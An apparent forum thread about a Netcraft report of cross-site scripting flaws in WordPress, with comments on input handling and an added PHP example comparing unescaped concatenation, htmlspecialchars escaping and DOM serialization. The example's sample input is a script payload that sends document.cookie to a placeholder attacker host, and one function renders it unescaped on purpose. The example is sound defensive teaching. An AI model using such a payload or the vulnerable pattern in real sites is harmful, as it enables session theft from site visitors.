Vulnerabilities Found in WordPress Blogging Tool
ZuperDee writes "According to this Netcraft article, 'Security vulnerabilities have been found in WordPress, the popular PHP-based open source blogging application. Some scripts in WordPress are not properly validated, leaving the program open to cross-site scripting (XSS) attacks in which third parties could insert content into a WordPress-driven site.'"
If you read Bugtraq and/or Websec, you'll see a dozen vulnerabilities of this kind each week.
There are still a lot of XSS bugs in a lot of products, and new ones get added all the time.
Just be careful out there, kids. Don't trust input. Barely trust output.
Eloi, Eloi, lema sabachtani?
www.fogbound.net
As a web developer, I _ALWAYS_ escape my output, and _ALWAYS_ preprocess my input.
As a C developer I _ALWAYS_ check my array indexes, and _ALWAYS_ allocate buffers of the right length.
Except, not every developer is as smart as you or I. Plus I get tired of typing that escape function, yah know?
After every freakin' PHP app on the planet has an XSS attack, then maybe people will figure this out.
I.e., make the thing output XML. Then use your favorite XSLT stylesheet to filter it.
Oh yeah, that makes a lot of sense for a 1-page PHP script.
Programmer ego shouldn't get in the way of solving an obvious problem.
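An added example, not WordPress code and not written by any of the posters above, showing the three approaches argued over in this sub-thread side by side: the straight string concatenation that produces the kind of XSS Netcraft is reporting, escaping at the point of output as the web-developer post recommends, and the "output XML and let the serializer do it" route, minus the XSLT step. The two input strings are constructed payloads; the helper names e(), renderVulnerable(), renderEscaped(), renderDom() and containsLiveMarkup() are assumptions of this example, not anything in WordPress.

```php
<?php
// Added example for illustration; not WordPress code.

// Constructed attacker input: a blog "comment" carrying a script payload,
// and an attribute value that tries to break out of its quotes.
$untrusted     = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
$untrustedAttr = '" onmouseover="alert(1)';

// 1. The pattern behind most of the Bugtraq reports: untrusted data
//    concatenated straight into HTML. The browser executes the payload.
function renderVulnerable(string $comment): string {
    return "<p class=\"comment\">$comment</p>";
}

// 2. Escape at the point of output, for the context you are writing into.
//    ENT_QUOTES also converts single quotes, so the same helper is safe
//    inside single- or double-quoted attributes; ENT_SUBSTITUTE keeps
//    malformed UTF-8 from silently producing an empty string.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderEscaped(string $comment, string $title): string {
    return '<p class="comment" title="' . e($title) . '">' . e($comment) . '</p>';
}

// 3. The "output XML" route: build a DOM tree and let the serializer
//    escape text and attribute values. There is no string concatenation
//    to forget, and an XSLT stylesheet could transform the result later.
function renderDom(string $comment, string $title): string {
    $doc = new DOMDocument('1.0', 'UTF-8');
    $p = $doc->createElement('p');
    $p->setAttribute('class', 'comment');
    $p->setAttribute('title', $title);               // quoted by the serializer
    $p->appendChild($doc->createTextNode($comment)); // never parsed as markup
    $doc->appendChild($p);
    return $doc->saveXML($p);
}

// Crude check used only to compare the three renderings: does the output
// still contain a live <script> tag or a real (unescaped) injected attribute?
// Escaped output contains "&lt;script" and "onmouseover=&quot;", which
// this pattern deliberately does not match.
function containsLiveMarkup(string $html): bool {
    return (bool) preg_match('/<script|onmouseover="/i', $html);
}

echo "vulnerable: ", renderVulnerable($untrusted), "\n";
echo "escaped:    ", renderEscaped($untrusted, $untrustedAttr), "\n";
echo "dom:        ", renderDom($untrusted, $untrustedAttr), "\n";

var_dump(containsLiveMarkup(renderVulnerable($untrusted)));
var_dump(containsLiveMarkup(renderEscaped($untrusted, $untrustedAttr)));
var_dump(containsLiveMarkup(renderDom($untrusted, $untrustedAttr)));
```

Run it with the command-line php binary (ext/dom is needed for renderDom). The check flags only the concatenated rendering; the other two print the payload as harmless text. The caveat a practitioner should keep in mind: the escaping in e() is correct for HTML element content and quoted attributes, but not for data placed inside a script block, a URL, or a style attribute, which each need their own encoding.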
I'm using mod_security, but I'm not sure whether it'll prevent or slow down XSS attacks. Can anyone advise me on this? Or do I have to wait for the WP developers for a patch?